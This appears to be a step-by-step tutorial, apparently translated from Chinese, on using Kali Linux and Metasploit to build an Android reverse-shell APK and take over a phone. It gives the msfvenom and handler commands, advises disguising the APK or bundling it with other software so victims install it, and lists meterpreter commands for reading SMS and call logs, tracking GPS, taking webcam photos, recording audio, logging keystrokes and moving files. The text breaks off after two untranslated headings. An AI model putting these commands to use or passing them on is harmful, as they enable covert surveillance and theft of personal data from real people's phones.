Kali Linux uses MSF to invade Android phones (small white version is super detailed)

1. What is msf

msfvenom a Metasploit standalone payload generator, Also a replacement for msfpayload and msfencode. is the software used to generate backdoors.
MSFvenom is a combination of Msfpayload and Msfencode, putting both tools in a single Framework instance. As of June 8, 2015, msfvenom replaces msfpayload and msfencode.

demo environment

Use Kali 2021.3 for demonstration operation
Target drone: emulator Xiaoyao Android 7.1.2
software: msfvenom , msfconsole (built-in Kali system)

Second, the penetration process

1. Enter administrator mode

Command: sudo su
Explanation: If you do not run in administrator mode, there may be a prompt about insufficient permissions. To avoid command execution failure, run the following command under administrator

Tip: Enter Kali's password after executing the command, the password is hidden, just enter it directly and press Enter

2. Generate executable Trojan files

Command: Example: Explanation: The local ip writes the IP address of your own Kali, and you can use ifconfig to view the IP address of your own Kali. The local port can set a port number that is not occupied. If the port number is occupied, the file will fail to be generated. A port number is just a file name , you can write any name you like, such as writing a free thumbs up, it may be easier for the target host to be hookedmsfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk

This is the IP address of the Kali host

Next, run the command to generate the Trojan

The default generated files are in the root directory

Put the Android backdoor just generated into the target drone

3. Run the msfconsole command

Order: msfconsole

4. Configuration parameters

(1) Command: use exploit/multi/handler (Select the module)
(2) Command: set payload android/meterpreter/reverse_tcp (Select the attack module)
(3) Command: set LhOST 192.168.32.1 (Fill in the IP address of your own host)
(4) Command: set lport 5555 (Fill in the port number when the file was just generated)
(5) Command: show options (View the setting parameters)
(6) Command: exploit -z -j (Execute in the background)

After the parameters are set, open the program on the target machine and execute the command in step 6. You can also directly enter the command exploitto start the attack. As long as the target machine has the backdoor software installed, any method can be used, and you can directly run the attack to start the attack.

Detailed attack configuration parameter demonstration:

Now wait for the target drone to open the APP

5. Open the executable file on the target machine

We can also disguise the program here, change its icon, or bundle it with some software, and when the user opens it, it will be automatically installed on the other party's computer.

6. View users

(1) Command: sessions (View the hooked users)
(2) Command: sessions -i 1 (Select the user to be attacked)

Appears meterpreteryou have successfully invaded successfully

3. Meterpreter hacks Android phone command

1. Check the other party's mobile phone system information

Order: sysinfo

2. Check which app files are installed on the other party's phone

Order: app_list

3. Remotely control the other party's mobile phone to take a photo

Order: webcam_snap

4. Remotely control the other party's mobile phone to start video chat

Order: webcam_chat

5. View the information of the other party's mobile phone in real time

Order: dump_sms

6. Get the address book of the other party's mobile phone

Order: dump_calllog

7. Obtain the GPS location of the other party's mobile phone in real time

Order: geolocate

8. More commands

You can also view the help documentation, commandhelp

cmd指令:
cat read file contents to screen
cd change directory
checksum retrieve file checksum
cp copy source to destination
del delete specified file
dir list file (alias for ls)
download download file or directory
edit edit file
getlwd print local working directory
getwd print working directory
lcd change local working directory
lls list local file
lpwd print local working directory
ls list file
mkdir create directory
mv move source to destination
pwd print working directory
rm delete specified file
rmdir delete directory
search search file
show_mount list all mounts mount point/logical drive
upload upload file or directory
pkill kill process by name

meterpreter命令：
keyscan_start start capturing keystrokes (start keylogging)
keyscan_dump dump keystroke buffer (download keylogging)
keyscan_stop stop capturing keystrokes (stop keylogging)
record_mic X seconds from the default microphone record_mic audio recording (audio recording)
webcam_chat start video chat (video , the other party will have a pop-up window)
webcam_list single camera (view the camera list)
webcam_snap take a snapshot from the specified camera (camera to take a photo)
webcam_stream play the video stream from the specified camera (open camera monitoring)
enumdesktops List all accessible desktops and window station (list of forms)
getdesktop get current meterpreter desktop
reboot reboot remote computer
shutdown shutdown remote computer
shell put system command shell
enumdesktops list all accessible desktops and window stations
getdesktop get current meterpreter desktop
idletime return remote user Idle seconds
keyboard_send send keystroke
keyevent send keystroke event
keyscan_dump dump keystroke buffer
keyscan_start start capturing keystroke
keyscan_stop stop capturing keystroke
mouse send mouse event
screenshare watch remote user desktop in real time
screenshot take screenshot of interactive desktop
setdesktop change Meterpreters current desktop
uictl control some user interface components
record_mic record audio from default microphone for X seconds
webcam_chat start video chat
webcam_list list webcam
webcam_snap capture from specified webcam Snapshot
webcam_stream Play the video stream from the specified webcam
play Play a wave audio file (.wav) on the target system
getsystem Attempt to elevate your privileges to those of the local system
execute -f notepad Open Notepad

把文件上传到靶机命令

把文件下载到主机命令